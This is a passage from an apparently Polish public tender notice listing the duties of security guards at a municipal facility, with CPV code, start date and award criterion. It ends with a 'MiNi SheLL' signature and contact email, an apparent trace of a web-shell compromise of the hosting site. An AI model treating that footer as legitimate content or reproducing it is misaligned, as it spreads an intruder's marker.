- dokonywanie oceny stanu zabezpieczenia obiektów, a w przypadku nieprawidłowości informowania pracowników Zamawiającego;
- terminowe przekazywania dokumentów związanych z właściwym wykonywaniem zadań przez służbę ochrony mienia Z-cy Kierownika Zakładu Usług Komunalnych;
- ochrona strzeżonych obiektów przed włamaniem, kradzieżą oraz dewastacją mienia znajdującego się w obiektach;
- dozór zewnętrzny obiektów;
- ochrona majątku trwałego znajdującego się wewnątrz i na zewnątrz obiektów;
- przeciwdziałanie aktom przestępczym, a w szczególności:
- stosowanie środków przymusu bezpośredniego, w przypadku zagrożenia dóbr powierzonych ochronie,
- ujecie osób stwarzających w sposób oczywisty bezpośrednie zagrożenie dla chronionego mienia, w celu niezwłocznego oddania tych osób Policji;
- współdziałanie z instytucjami powołanymi do zabezpieczenia porządku, np.: z Policją, Strażą Miejską, Strażą Pożarną;
- podejmowanie wszelkich dostępnych działań w celu zabezpieczenia i ochrony mienia strzeżonych obiektów;
- niezwłoczne meldowanie o zaistniałych wypadkach włamań, kradzieży, dewastacji mienia i innych ważnych wydarzeniach (awarie);
- uruchamianie procedur alarmowych w sytuacji zagrożenia;
- przeprowadzanie obchodów chronionego terenu w jednogodzinnych odstępach w godz. od 16:00 do 06:00 dnia następnego w dni powszednie oraz w dni świąteczne i wolne od pracy;
- zabezpieczanie śladów stwierdzonych przestępstw przeciw mieniu i ludziom;
- zachowanie tajemnicy służbowej;
- punktualne rozpoczynanie pracy przez pracownika ochrony;
- pełnienie służby do chwili przejęcia obowiązków przez pracowników Zamawiającego;
- systematyczne sprawdzanie stanu technicznego ogrodzenia i zamknięć;
- nie zezwalanie na przebywanie w pomieszczeniach służbowych osobom postronnym;
- dokonywanie szczegółowej kontroli podporządkowanych obiektów, a w szczególności stanu zamknięcia okien, drzwi, bram, furtek, odbojnic;
- na bieżąco prowadzenie Książki dyżurów w sposób dokładny i staranny poprzez
wpisywanie:
a)częstotliwości i czasu trwania obchodów dziennych, ciągłości patroli nocnych oraz wszelkich zaistniałych zdarzeń,
b) wszelkich uwag dotyczących np. niewłaściwego zabezpieczenia obiektu, awarii, oświetlenia instalacji alarmowej, elektrycznej, wodociągowo-kanalizacyjnej, uszkodzeń ogrodzenia, wybicia szyb, nie zamkniętych okien, itp. 
c) odnotowywanie faktu zdania i przyjęcia dyżuru,
- przedkładanie Z-cy Kierownika Zakładu Usług Komunalnych książki dyżurów z wpisanymi uwagami i spostrzeżeniami z pełnienia służby, codziennie rano do godziny 07:30;
- kontrola ruchu osób na chronionym terenie;
- po godzinie 15:00 sprawdzanie zamknięć obiektów i pojazdów pozostawionych na terenie chronionym, a w przypadku stwierdzenia włamania, kradzieży, dewastacji mienia itp. niezwłocznego powiadomienia Kierownictwa Spółki oraz Policji;
- każda ze zmian prowadzona jest przez wyznaczonego imiennie pracownika, który odpowiada za całokształt służby na zmianie;
- pracownikom służby ochrony mienia w czasie służby zabrania się:
a) spać w czasie pełnienia służby,
b) schodzić z posterunku bez ważnej przyczyny,
c) spożywać alkohol pod jakąkolwiek postacią lub być pod jego wpływem,
d) wykonywać inne czynności, które mogłyby osłabić czujność i wpłynąć ujemnie na jakość pełnionej służby,
- pracownicy służby ochrony mienia  w czasie służby zobowiązani są do:
a) dbania o wygląd zewnętrzny oraz właściwego zachowania się na służbie, 
b) stosowania się do poleceń osoby z ramienia Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.02.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com